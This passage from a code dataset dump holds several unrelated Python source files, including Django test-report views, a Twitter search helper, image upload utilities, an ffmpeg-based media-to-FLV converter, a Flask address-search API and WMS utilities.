vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'follow'))\n\n\ndef do_step_01():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'first'))\n\ndef do_step_02():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'first'))\n\ndef do_step_03():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'second'))\n\ndef do_step_04():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test01'))\n\ndef do_step_05():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'second'))\n\ndef do_step_06():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'follow01'))\n\ndef do_step_07():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test02'))\n\ndef do_step_08():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'third'))\n\ndef do_step_09():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test03'))\n\ndef do_step_10():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'third'))\n\ndef do_step_11():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'follow02'))\n\ndef do_step_12():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test04'))\n\ndef do_step_13():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'fourth'))\n\ndef do_step_14():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test05'))\n\ndef do_step_15():\n vcore.splitter('save', provider = RexExcelProvider(platform = '9X40', test_version = 'fourth'))\n\ndef do_step_16():\n vcore.splitter('save', provider = RexJiraProvider(platform = '9X40', test_version = 'follow03'))\n\ndef do_step_17():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test06'))\n\ndef do_step_18():\n vcore.splitter('save', provider = JenkinsProvider(platform = '9X40', test_version = 'test07'))\n\nshow_supported_cmds = {\n 'do_step_01' : do_step_01,\n 'do_step_02' : do_step_02,\n 'do_step_03' : do_step_03,\n 'do_step_04' : do_step_04,\n 'do_step_05' : do_step_05,\n 'do_step_06' : do_step_06,\n 'do_step_07' : do_step_07,\n 'do_step_08' : do_step_08,\n 'do_step_09' : do_step_09,\n 'do_step_10' : do_step_10,\n 'do_step_11' : do_step_11,\n 'do_step_12' : do_step_12,\n 'do_step_13' : do_step_13,\n 'do_step_14' : do_step_14,\n 'do_step_15' : do_step_15,\n 'do_step_16' : do_step_16,\n 'do_step_17' : do_step_17,\n 'do_step_18' : do_step_18,\n}\n\nglobal_cmd = \"\"\ndef rex_show_actions_dispatcher(request):\n # assert False, \"Rex >> {}\".format(request.path)\n print(\"Hook: GET->{} , POST->{}, path->{}\".format(request.GET,request.POST, request.path))\n global global_cmd\n for name, cmd in request.GET.items():\n if name == \"command\":\n if cmd and cmd in show_supported_cmds:\n show_supported_cmds[cmd]()\n global_cmd = cmd\n #return HttpResponseRedirect(\"/rex_commands/\")\n return HttpResponseRedirect(\"/rex_prompt/\")\n\ndef rex_prompt(request):\n global global_cmd\n #return render(request, 'LigerUI/ACIS/rex_debug/prompt.htm', {'cmd' : global_cmd})\n return HttpResponse(\"Command : {} done\".format(global_cmd))\n\ndef rex_test_query(request):\n from ..vcore import TestReportQuery\n #q = 
TestReportQuery('integration_query_exactly', platform= 'SD55', fw_version=\"SWI9X28A_00.11.01.06\", test_date=\"2019-02-03\")\n # q = TestReportQuery('integration_query_exactly', platform= 'SD55', fw_version=\"SWI9X28A_00.11.01.06\", test_date=\"2019-01-03\")\n # q = TestReportQuery('night_regression_query', platform= 'SD55', test_date=\"2019-01-03\")\n # q = TestReportQuery('ERD_caselist_query', platform= 'SD55', ERD_ID=\"04.60.26\")\n q = TestReportQuery('casename_query', platform= 'SD55', casename = \"test_case_03_alpha_02\")\n q.do_query()\n return HttpResponse(\"done\")\n","sub_path":"AcisWeb/AcisDB/rex_debug/views_of_rex.py","file_name":"views_of_rex.py","file_ext":"py","file_size_in_byte":25309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"362808090","text":"import oauth2 as oauth\nimport json\nfrom credentials import *\n\ndef oauth_twitter_search(query, consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET, lang=\"en\", result_type=\"recent\", count=100):\n \"\"\" Search Twitter ...\n looks like Tweets with \"truncated\": true could pose a problem\n \"\"\"\n search_endpoint = \"https://api.twitter.com/1.1/search/tweets.json\"\n compiled_search_endpoint = \"{}?q={}&count={}&result_type={}&lang={}\".format(search_endpoint, query, count, result_type, lang)\n consumer = oauth.Consumer(key=CONSUMER_KEY, secret=CONSUMER_SECRET)\n client = oauth.Client(consumer)\n response, data = client.request(compiled_search_endpoint)\n tweets = json.loads(data)\n return tweets\n\nnasa_tweets = oauth_twitter_search(\"@nasa\")\ncontrol_tweets = oauth_twitter_search(\"the\")\n","sub_path":"twitter_ml.py","file_name":"twitter_ml.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"327313336","text":"from util import *\n\n\n\n@apply\ndef apply(self):\n x = self.of(Floor)\n\n return Equal(self, -ceiling(-x))\n\n\n@prove\ndef prove(Eq):\n from axiom import algebra\n x = Symbol(real=True)\n Eq << apply(floor(x))\n\n Eq << -Eq[0]\n\n Eq << Eq[-1].this.rhs.apply(algebra.ceiling.to.mul)\n\nif __name__ == '__main__':\n run()\n\n# created on 2018-10-22\n","sub_path":"axiom/algebra/floor/to/mul/ceiling.py","file_name":"ceiling.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"643843788","text":"#!/usr/bin/env python\n\n'''\n'''\n\n__docformat__ = 'restructuredtext'\n__version__ = '$Id: $'\n\nimport sys\n\nif sys.platform == 'win32' and False:\n sys.stderr = sys.stdout = open('errors.txt', 'w')\n\nimport pyglet\n\npyglet.options['debug_gl'] = False\n\npyglet.resource.path = ('res',)\npyglet.resource.reindex()\n\nimport gamelib\ngamelib.main()\n","sub_path":"CreateApplications/pyweek/kite_story-1.1/run_game.py","file_name":"run_game.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"370791396","text":"# for文と同じ働きをする関数を自作\ndef for_func(iterable, callback):\n it = iter(iterable)\n while True:\n try:\n v = next(it)\n callback(v)\n except StopIteration:\n break\n\n# リストの内容を全て画面に表示\nnums = [1, 2, 3]\nfor_func(nums, lambda i : print(i))\n\n# 辞書型の内容を全て画面に表示\nages = {\"Taro\":20, \"Jiro\":15, \"Saburo\":18}\nfor_func(ages.items(), lambda n 
:print(n))\n\n","sub_path":"for-func.py","file_name":"for-func.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"519434419","text":"import os\nimport sys\nimport uuid\nimport common\nimport requests\nimport traceback\nimport numpy as np\nfrom PIL import Image\nfrom search import Search\nfrom urllib.parse import urlparse\nfrom io import StringIO\nfrom enums import*\nfrom common import*\nfrom common_config import Common_config\nfrom flask import Flask, render_template, request, jsonify, make_response, url_for, g\n\n\nconfig = Common_config()\nroot_direc = config.get_root_path()\nsample_direc = config.get_sample_img_path()\nupload_direc = config.get_upload_path()\nmodel_path = config.get_model_path()\n\nmax_file_size = 3750000\n\ndef str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\ndef delete_all_uploaded():\n\n directory = \".\" + upload_direc\n for root, dirs, files in os.walk(directory):\n for file in files:\n print(file)\n os.remove(file)\n\ndef get_file_ext(file_path):\n\n\ttemp = file_path.split('.')\n\tlength = len(temp)\n\tif(length > 0):\n\t\treturn temp[length - 1]\n\treturn \"jpg\"\n\ndef get_parsed_url(url):\n \n o = urlparse(url)\n url = o.geturl()\n\n return url.strip()\n\ndef get_img_filename_from_url(self):\n \n temp = request.args.get(\"url\").split('\\\\')\n img_url = temp[len(temp) - 2] + \"/\" + temp[len(temp) - 1]\n return img_url\n \ndef is_largeimage_size(file):\n \n img_bytes = file.read()\n file_size = sys.getsizeof(img_bytes)\n\n if(file_size < max_file_size):\n return False\n return True\n\ndef has_large_dimensions(file):\n\n \n im = Image.open(file)\n width, height = im.size\n \n if(width > 1600):\n return True\n if(height > 1600):\n return True\n\n\ndef resize_image(img_path, img_full_path):\n\n try:\n \n image = Image.open(open(img_full_path, mode='rb'))\n\n width = image.size[0]\n height = image.size[1]\n \n file_size = None\n\n if(width < height and width > 1600):\n\n img_bytes, img_path, image = save_image_new_size(image, 1600, height)\n file_size = sys.getsizeof(img_bytes)\n \n elif(height < width and height > 1600):\n \n img_bytes, img_path, image = save_image_new_size(image, width, 1600)\n file_size = sys.getsizeof(img_bytes)\n \n if(not file_size is None):\n \n while (file_size > max_file_size):\n \n next_width = width - 150\n next_height = next_width\n img_bytes, img_path, image = save_image_new_size(image, next_width, \n next_height)\n\n file_size = sys.getsizeof(img_bytes)\n width = next_width\n\n return img_path\n\n except Exception as e:\n var = traceback.format_exc()\n print(str(var))\n return None\n\ndef save_image_new_size(image, width, height):\n \n img_path = upload_direc + \"/\" + str(uuid.uuid4()) + \".\" + image.format\n file_path = root_direc +\"/\" + img_path\n \n '''thumbnail will maintain aspect ratio'''\n image.thumbnail((width, height), Image.ANTIALIAS)\n image.save(file_path, format=image.format)\n img_bytes = open(file_path, mode='rb').read()\n \n return img_bytes, img_path, image\n\ndef save_url_img(url, file_content):\n\n file_ext = get_file_ext(url)\n if(not file_ext.lower() in [\"jpg\", \"jpeg\", \"png\"]):\n file_ext = \"jpg\"\n \n file_name = str(uuid.uuid4()) + \".\" + file_ext\n\n file_path = root_direc + \"/\" + upload_direc + \"/\" + file_name\n \n file = open(file_path, 'wb')\n file.write(file_content)\n file.close()\n\n img_path = upload_direc + \"/\" + file_name\n return img_path\n\ndef 
save_posted_file(posted_file):\n \n file_ext = get_file_ext(posted_file.filename)\n file_name = str(uuid.uuid4()) + posted_file.filename\n file_path = root_direc + \"/\" + upload_direc + \"/\" + file_name\n posted_file.save(file_path)\n \n img_path = upload_direc + \"/\" + file_name\n\n return img_path\n\ndef get_image_paths(img_path):\n \n img_path = request.args.get(\"imgPath\").replace(\"thumbnails\", \"animals\").replace(\"\\\\\", \"/\")\n \n img_full_path = root_direc + img_path\n\n return img_path, img_full_path\n\ndef check_if_valid_image(img_path):\n try:\n img = Image.open(img_path) # open the image file\n img.verify() \n return True, \"no error\"\n except (IOError, SyntaxError) as e:\n print('Bad file:', img_path)\n print(str(e))\n return False, \"Sorry, Could not read the image\"","sub_path":"demo/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"41162421","text":"# Copyright (C) 2008 Distance and e-Learning Centre,\n# University of Southern Queensland\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n\nimport os\n\n\"\"\" Plugin to convert media files: audio/video to .flv files \"\"\"\n\npluginName = \"ice.converter.mediaToFlv\"\npluginDesc = \"Convert media files to flv\"\npluginFunc = None # either (or both) pluginFunc or pluginClass should\npluginClass = None # be set by the pluginInit() method\npluginInitialized = False # set to True by pluginInit() method\n\ndef pluginInit(iceContext, **kwargs):\n global pluginFunc, pluginClass, pluginInitialized\n pluginFunc = None\n pluginClass = MediaToFlv\n pluginInitialized = True\n return pluginFunc\n\nclass MediaToFlv(object):\n mimeType = [\"audio\", \"video\"]\n \n def __init__(self, iceContext, **kwargs):\n self.iceContext = iceContext\n self.__mediaToFlvWrapper = MediaToFlvWrapper(iceContext)\n self.__isAvailable = self.__mediaToFlvWrapper.isAvailable\n self.__convertServer = None\n if self.__isAvailable==False:\n self.__convertServer = iceContext.getPluginClass(\"ice.extra.convertServer\")\n\n @property\n def isAvailable(self):\n return self.__isAvailable\n \n def convert(self, fromToObj, **kwargs):\n \"\"\"\n fromToObj must support the following methods:\n getFromFile(), getToFile(), getData(), putData(data=data [, name=None])\n \"\"\"\n return self.__mediaToFlvWrapper.ffmpeg(fromToObj)\n\n############################\n\n\nclass MediaToFlvWrapper(object):\n \"\"\" Conversion of media file to flv format and vice versa \"\"\"\n \n \"Not tested extension: mov,3gp,3g2,mj2\"\n def __init__(self, iceContext):\n self.iceContext = iceContext\n self.__fs = iceContext.fs\n self.__system = iceContext.system\n self.__ffmpegAvailable = None\n\n @property\n def isAvailable(self):\n if self.__ffmpegAvailable is None:\n self.__ffmpegAvailable = 
self.__ffmpegAvailableCheck()\n return self.__ffmpegAvailable\n\n def ffmpeg(self, inputFile, outputFile = None, outputType=\".flv\", **kwargs):\n \"\"\" run ffmpeg to convert the audio/video to flv\n @param inputFile: absolute path of the audio/video file\n @type inputFile: String\n @param outputFile: absolute path of the converted audio/video file\n @type inputFile: String\n \n @rtype: String\n @return: outputFile path\n \n Parameters of ffmpeg\n #-y :: overwrite the output file if it already exists\n #-i [inputFile.ext] :: the input video file\n #-acodec libfaac :: using the aac codec --> This acodec might not be necessary as it require the codec to be installed\n #-ar 44100 :: the audio sampling rate\n #-ab 96k :: the audio bitrate\n #-vcodec libx264 :: use the x264 codec\n #-s 1280x540 :: the size of the output video\n #-b 1600k :: the bitrate of the output video\n #-g 250 :: frequency of keyframes\n #-r 20 :: the frame rate\n #[outputFile.ext] :: the output file\n \n #converting .mp4 to .flv\n #ffmpeg -i test.mp4 -sameq -deinterlace -s 384x288 -aspect 4:3 -b 512k -y -ac 1 testmp4.flv \n \n #converting .wav to .flv\n #ffmpeg -i test.wav -ab 8000 testwav.flv\n \n #converting .wmv to .flv\n #ffmpeg -i \"test.wmv\" -sameq -ar 22050 -ab 96000 -deinterlace -nr 500 -s 320x240 -aspect 4:3 -r 20 -g 500 -me_range 20 -b 270k -deinterlace -f flv -y \"testwmv.flv\" //-acodec libmp3lame is removed\n \n #converting .mov to .flv\n #ffmpeg -y -i trailerTest.mov -ar 44100 -ab 96k -coder ac -me full -me_range 16 -subq 5 -sc_threshold 40 -s 1280x544 -b 1600k -cmp +chroma -partitions +parti4x4+partp8x8+partb8x8 -i_qfactor 0.71 -keyint_min 25 -b_strategy 1 -g 250 -r 20 87.mp4;\n \"\"\"\n \n path, name, ext = self.__fs.splitPathFileExt(inputFile)\n if outputFile is None:\n outputFile = self.__fs.join(path, name + outputType)\n \n cmd = \"\"\n if ext == \".mp4\":\n cmd = 'ffmpeg -i \"%s\" -sameq -deinterlace -s 384x288 -aspect 4:3 -b 512k -y -ac 1 \"%s\"' % (inputFile, outputFile)\n elif ext == \".wav\":\n cmd = 'ffmpeg -i \"%s\" -ab 8000 -ar 11025 \"%s\"' % (inputFile, outputFile)\n elif ext == \".wma\":\n cmd = 'ffmpeg -i \"%s\" -ab 8000 \"%s\"' % (inputFile, outputFile)\n elif ext == \".wmv\":\n cmd = 'ffmpeg -i \"%s\" -sameq -ar 22050 -ab 96000 -deinterlace -nr 500 -s 320x240 -aspect 4:3 -r 20 -g 500 -me_range 20 -b 270k -deinterlace -f flv -y \"%s\"' % (inputFile, outputFile)\n elif ext == \".mov\":\n #cmd = 'ffmpeg -y -i \"%s\" -ar 44100 -ab 96k -coder ac full -me_range 16 -subq 5 -sc_threshold 40 -s 1280x544 -b 1600k -cmp +chroma -partitions +parti4x4+partp8x8+partb8x8 -i_qfactor 0.71 -keyint_min 25 -b_strategy 1 -g 250 -r 20 \"%s\"' % (inputFile, outputFile);\n cmd = 'ffmpeg -i \"%s\" -ar 22050 -ab 128k -b 400k -s 320x240 -aspect 4:3 -f flv \"%s\"' % (inputFile, outputFile)\n elif ext == \".mp3\":\n cmd = 'ffmpeg -y -i \"%s\" -f flv -ab 64 -ac 1 \"%s\"' % (inputFile, outputFile)\n elif ext == \".m4a\":\n cmd = 'ffmpeg -i \"%s\" -f flv -b 300000 -s 360x240 -r 30 -ac 2 -ab 64k -ar 44100 -vcodec flv \"%s\"' % (inputFile, outputFile)\n elif ext == \".mpg\" or ext == \".mpeg\":\n cmd = 'ffmpeg -i \"%s\" -ar 22050 -ab 32 -f flv -s 320x240 -aspect 4:3 -y \"%s\"' % (inputFile, outputFile)\n else:\n outputFile = \"\"\n raise Exception(\"Unsupported extension: %s\" % ext)\n \n result = os.popen(cmd)\n# for i in result.readlines():\n# print \"result: \", i\n return outputFile\n\n def __ffmpegAvailableCheck(self):\n \"\"\" check if ffmpeg is install locally\n @rtype: boolean\n @return: true if lame is installed 
locally\n \"\"\"\n result = os.popen(\"ffmpeg -version\")\n for line in result.readlines():\n if line.startswith(\"FFmpeg\"):\n return True \n return False\n","sub_path":"apps/ice/plugins/converters/plugin_mediaToFlv.py","file_name":"plugin_mediaToFlv.py","file_ext":"py","file_size_in_byte":6847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"137498449","text":"import json\nimport re\n\nfrom flask import Blueprint, current_app, g, Response\n\nfrom search_api import config\nfrom search_api.exceptions import ApplicationError\nfrom search_api.utilities.V2_0 import address_response_mapper_v_2\nfrom flask.globals import request\n\naddresses_V_2 = Blueprint('addresses_V_2', __name__, url_prefix='/v2.0/search/addresses')\n\nbody = {\n \"datasource\": \"local_authority\",\n \"search_type\": \"\",\n \"query_value\": \"\",\n \"response_srid\": \"EPSG:27700\",\n \"max_results\": 1000\n}\npostcode_regex_check = '^([Gg][Ii][Rr] 0[Aa]{2})|((([A-Za-z][0-9]{1,2})|(([A-Za-z][A-Ha-hJ-Yj-y][0-9]{1,2})' \\\n '|(([A-Za-z][0-9][A-Za-z])|([A-Za-z][A-Ha-hJ-Yj-y][0-9]?[A-Za-z])))) [0-9][A-Za-z]{2})$'\n\nuprn_regex_check = '^[0-9]{6,12}$'\nusrn_regex_check = '^\\\d+$'\n\n\n@addresses_V_2.route('/postcode/<postcode>', methods=['GET'])\ndef get_addresses_by_postcode(postcode):\n current_app.logger.info(\"Get address by postcode '%s'\", postcode)\n postcode = postcode.strip()\n postcode_is_valid = re.match(postcode_regex_check, postcode)\n\n if postcode_is_valid is not None:\n body[\"search_type\"] = \"postcode\"\n body[\"query_value\"] = postcode\n return search_for_addresses(body)\n else:\n raise ApplicationError(\"Unprocessable Entity: Postcode is not valid\", 422, 422)\n\n\n@addresses_V_2.route('/uprn/<uprn>', methods=['GET'])\ndef get_addresses_by_uprn(uprn):\n current_app.logger.info(\"Get address by UPRN '%s'\", uprn)\n uprn = uprn.strip()\n uprn_is_valid = re.match(uprn_regex_check, uprn)\n\n if uprn_is_valid is not None:\n body[\"search_type\"] = \"uprn\"\n body[\"query_value\"] = int(uprn)\n return search_for_addresses(body)\n else:\n raise ApplicationError(\"Unprocessable Entity: UPRN is not valid\", 422, 422)\n\n\n@addresses_V_2.route('/usrn/<usrn>', methods=['GET'])\ndef get_addresses_by_usrn(usrn):\n current_app.logger.info(\"Get address by USRN '%s'\", usrn)\n usrn = usrn.strip()\n usrn_is_valid = re.match(usrn_regex_check, usrn)\n\n if usrn_is_valid is not None:\n body[\"search_type\"] = \"usrn\"\n body[\"query_value\"] = int(usrn)\n return search_for_addresses(body)\n else:\n raise ApplicationError(\"Unprocessable Entity: USRN is not valid\", 422, 422)\n\n\n@addresses_V_2.route('/text/<text>', methods=['GET'])\ndef get_addresses_by_text(text):\n current_app.logger.info(\"Get address by text '%s'\", text)\n text = text.strip()\n\n body[\"search_type\"] = \"text_search\"\n body[\"query_value\"] = text\n\n return search_for_addresses(body)\n\n\ndef search_for_addresses(request_body):\n current_app.logger.info(\"Performing address search\")\n search_results = g.requests.post(config.ADDRESS_API_URL + '/v2/addresses/search',\n data=json.dumps(request_body, sort_keys=True),\n headers={\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"})\n if search_results.status_code == 400:\n raise ApplicationError(search_results.json(), 400, 400)\n if search_results.status_code != 200:\n raise ApplicationError(search_results.json(), 500, 500)\n if not search_results.json():\n current_app.logger.warning(\"No addresses found for search\")\n raise ApplicationError(\"No 
addresses found for search.\", 404, 404)\n\n mapped_resp = address_response_mapper_v_2.map_address_response(search_results.json())\n\n # If index_map argument set to true, get index map for all the addresses\n if request.args.get('index_map') and request.args.get('index_map').lower() == 'true' and config.INDEX_MAP_API_URL:\n for address in mapped_resp:\n if 'uprn' in address and address['uprn']:\n index_map = search_for_index_map(address['uprn'])\n if index_map:\n address['index_map'] = index_map\n\n current_app.logger.info(\"Returning address search result\")\n return Response(\n response=json.dumps(mapped_resp),\n status=200,\n mimetype=\"application/json\"\n )\n\n\ndef search_for_index_map(uprn):\n current_app.logger.info(\"Performing uprn title search\")\n\n title_resp = g.requests.get('{}/v1/uprns/{}'.format(config.INDEX_MAP_API_URL, uprn),\n headers={\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"})\n if title_resp.status_code == 200:\n features = []\n for title in title_resp.json():\n current_app.logger.info(\"Performing index map search\")\n index_map_resp = g.requests.get(\n '{}/v1/index_map/{}'.format(config.INDEX_MAP_API_URL, title),\n headers={\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"})\n if index_map_resp.status_code == 200:\n index_map_json = index_map_resp.json()\n features = features + index_map_json['features']\n elif index_map_resp.status_code != 404:\n raise ApplicationError(index_map_resp.json(), 500, 500)\n if features:\n return {\"type\": \"FeatureCollection\",\n \"features\": features}\n elif title_resp.status_code != 404:\n raise ApplicationError(title_resp.json(), 500, 500)\n\n return None\n","sub_path":"search_api/resources/V2_0/addresses_v_2.py","file_name":"addresses_v_2.py","file_ext":"py","file_size_in_byte":5243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"606135644","text":"import csv\n\ndef read_file(path):\n with open(path, 'r') as file_to_read:\n data = file_to_read.read()\n return data\ndef Abrir_Archivo():\n data = open('practica4.csv',encoding = 'utf-8')\n csv_data = csv.reader(data)\n return list(csv_data)\n\ndef Sacar_Correos_Calif(lista):\n email = []\n _lista = lista\n for line in _lista[1:]:\n email.append(line[1]+' '+line[2])\n return email\n\ndef Sort_Correos_Calif(lista):\n slista = []\n _lista = lista\n arroba = 0\n for i in range(len(_lista)):\n arroba = _lista[i].find(\"@\")\n slista.append(_lista[i][(arroba+1):].split())\n slista.sort()\n return slista \n\ndef Promedio(lista):\n _lista = lista\n dprom = {}\n calif = int(_lista[0][1])\n count = 1\n prom = 0 \n for i in range((len(_lista)-1)):\n if _lista[i+1][0] == _lista[i][0]:\n count += 1\n calif += int(_lista[(i+1)][1])\n else:\n if(_lista.index(_lista[i+1])+1 == len(_lista)):\n dprom[_lista[i+1][0]] = int(_lista[(i+1)][1])\n prom = calif/count\n calif = int(_lista[(i+1)][1])\n count = 1\n dprom[_lista[i][0]] = prom\n return dprom \n\nlista = Abrir_Archivo()\nclista = Sacar_Correos_Calif(lista)\nslista = Sort_Correos_Calif(clista)\ndprom = Promedio(slista)\nprint(dprom) ","sub_path":"ago-dic-2020/Jonathan ivan aguilar cedillo/practica 4/practica4.py","file_name":"practica4.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"292839580","text":"from __future__ import absolute_import, division, print_function\n\ntry:\n import regex as re\nexcept ImportError:\n import re\n\nimport 
numpy\nimport xarray\nfrom datetime import datetime\nfrom dateutil.parser import parse\nfrom dateutil.relativedelta import relativedelta\nfrom pytz import utc\n\ntry:\n from rasterio.warp import Resampling\nexcept ImportError:\n from rasterio.warp import RESAMPLING as Resampling\n\nfrom affine import Affine\nfrom datacube.utils import geometry\nimport math\n\nfrom datacube_ows.ows_configuration import get_config\nfrom datacube_ows.ogc_utils import solar_date, create_geobox\nfrom datacube_ows.ogc_exceptions import WMSException\n\nRESAMPLING_METHODS = {\n 'nearest': Resampling.nearest,\n 'cubic': Resampling.cubic,\n 'bilinear': Resampling.bilinear,\n 'cubic_spline': Resampling.cubic_spline,\n 'lanczos': Resampling.lanczos,\n 'average': Resampling.average,\n}\n\n\ndef _bounding_pts(minx, miny, maxx, maxy, width, height, src_crs, dst_crs=None):\n # pylint: disable=too-many-locals\n p1 = geometry.point(minx, maxy, src_crs)\n p2 = geometry.point(minx, miny, src_crs)\n p3 = geometry.point(maxx, maxy, src_crs)\n p4 = geometry.point(maxx, miny, src_crs)\n\n conv = dst_crs is not None\n gp1 = p1.to_crs(dst_crs) if conv else p1\n gp2 = p2.to_crs(dst_crs) if conv else p2\n gp3 = p3.to_crs(dst_crs) if conv else p3\n gp4 = p4.to_crs(dst_crs) if conv else p4\n\n minx = min(gp1.points[0][0], gp2.points[0][0], gp3.points[0][0], gp4.points[0][0])\n maxx = max(gp1.points[0][0], gp2.points[0][0], gp3.points[0][0], gp4.points[0][0])\n miny = min(gp1.points[0][1], gp2.points[0][1], gp3.points[0][1], gp4.points[0][1])\n maxy = max(gp1.points[0][1], gp2.points[0][1], gp3.points[0][1], gp4.points[0][1])\n\n # miny-maxy for negative scale factor and maxy in the translation, includes inversion of Y axis.\n\n return minx, miny, maxx, maxy\n\n\ndef _get_geobox_xy(args, crs):\n if get_config().published_CRSs[str(crs)][\"vertical_coord_first\"]:\n miny, minx, maxy, maxx = map(float, args['bbox'].split(','))\n else:\n minx, miny, maxx, maxy = map(float, args['bbox'].split(','))\n return minx, miny, maxx, maxy\n\n\ndef _get_geobox(args, src_crs, dst_crs=None):\n width = int(args['width'])\n height = int(args['height'])\n minx, miny, maxx, maxy = _get_geobox_xy(args, src_crs)\n\n if minx == maxx or miny == maxy:\n raise WMSException(\"Bounding box must enclose a non-zero area\")\n if dst_crs is not None:\n minx, miny, maxx, maxy = _bounding_pts(\n minx, miny,\n maxx, maxy,\n width, height,\n src_crs, dst_crs=dst_crs\n )\n\n out_crs = src_crs if dst_crs is None else dst_crs\n return create_geobox(\n out_crs,\n minx, miny, maxx, maxy,\n width, height\n )\n\n\ndef _get_polygon(args, crs):\n minx, miny, maxx, maxy = _get_geobox_xy(args, crs)\n poly = geometry.polygon([(minx, maxy), (minx, miny), (maxx, miny), (maxx, maxy), (minx, maxy)], crs)\n return poly\n\n\ndef int_trim(val, minval, maxval):\n return max(min(val, maxval), minval)\n\n\ndef zoom_factor(args, crs):\n # Determine the geographic \"zoom factor\" for the request.\n # (Larger zoom factor means deeper zoom. Smaller zoom factor means larger area.)\n # Extract request bbox and crs\n width = int(args['width'])\n height = int(args['height'])\n minx, miny, maxx, maxy = _get_geobox_xy(args, crs)\n\n # Project to a geographic coordinate system\n # This is why we can't just use the regular geobox. 
The scale needs to be\n # \"standardised\" in some sense, not dependent on the CRS of the request.\n geo_crs = geometry.CRS(\"EPSG:4326\")\n minx, miny, maxx, maxy = _bounding_pts(\n minx, miny,\n maxx, maxy,\n width, height,\n crs, dst_crs=geo_crs\n )\n # Create geobox affine transformation (N.B. Don't need an actual Geobox)\n affine = Affine.translation(minx, miny) * Affine.scale((maxx - minx) / width, (maxy - miny) / height)\n # Zoom factor is the reciprocal of the square root of the transform determinant\n # (The determinant is x scale factor multiplied by the y scale factor)\n return 1.0 / math.sqrt(affine.determinant)\n\n\ndef img_coords_to_geopoint(geobox, i, j):\n cfg = get_config()\n h_coord = cfg.published_CRSs[str(geobox.crs)][\"horizontal_coord\"]\n v_coord = cfg.published_CRSs[str(geobox.crs)][\"vertical_coord\"]\n return geometry.point(geobox.coordinates[h_coord].values[int(i)],\n geobox.coordinates[v_coord].values[int(j)],\n geobox.crs)\n\n\ndef get_product_from_arg(args, argname=\"layers\"):\n layers = args.get(argname, \"\").split(\",\")\n if len(layers) != 1:\n raise WMSException(\"Multi-layer requests not supported\")\n layer = layers[0]\n layer_chunks = layer.split(\"__\")\n layer = layer_chunks[0]\n cfg = get_config()\n product = cfg.product_index.get(layer)\n if not product:\n raise WMSException(\"Layer %s is not defined\" % layer,\n WMSException.LAYER_NOT_DEFINED,\n locator=\"Layer parameter\",\n valid_keys=list(cfg.product_index))\n return product\n\n\ndef get_arg(args, argname, verbose_name, lower=False,\n errcode=None, permitted_values=None):\n fmt = args.get(argname, \"\")\n if lower:\n fmt = fmt.lower()\n if not fmt:\n raise WMSException(\"No %s specified\" % verbose_name,\n errcode,\n locator=\"%s parameter\" % argname,\n valid_keys=permitted_values)\n\n if permitted_values:\n if fmt not in permitted_values:\n raise WMSException(\"%s %s is not supported\" % (verbose_name, fmt),\n errcode,\n locator=\"%s parameter\" % argname,\n valid_keys=permitted_values)\n return fmt\n\n\ndef get_times_for_product(product):\n ranges = product.ranges\n return ranges['times']\n\n\ndef get_times(args, product):\n # Time parameter\n times_raw = args.get('time', '')\n times = times_raw.split(',')\n\n return list([parse_time_item(item, product) for item in times])\n\n\ndef parse_time_item(item, product):\n times = item.split('/')\n # Time range handling follows the implementation described by GeoServer\n # https://docs.geoserver.org/stable/en/user/services/wms/time.html\n\n # If all times are equal we can proceed\n if len(times) > 1:\n start, end = parse_wms_time_strings(times)\n start, end = start.date(), end.date()\n matching_times = [t for t in product.ranges['times'] if start <= t <= end]\n if matching_times:\n # default to the first matching time\n 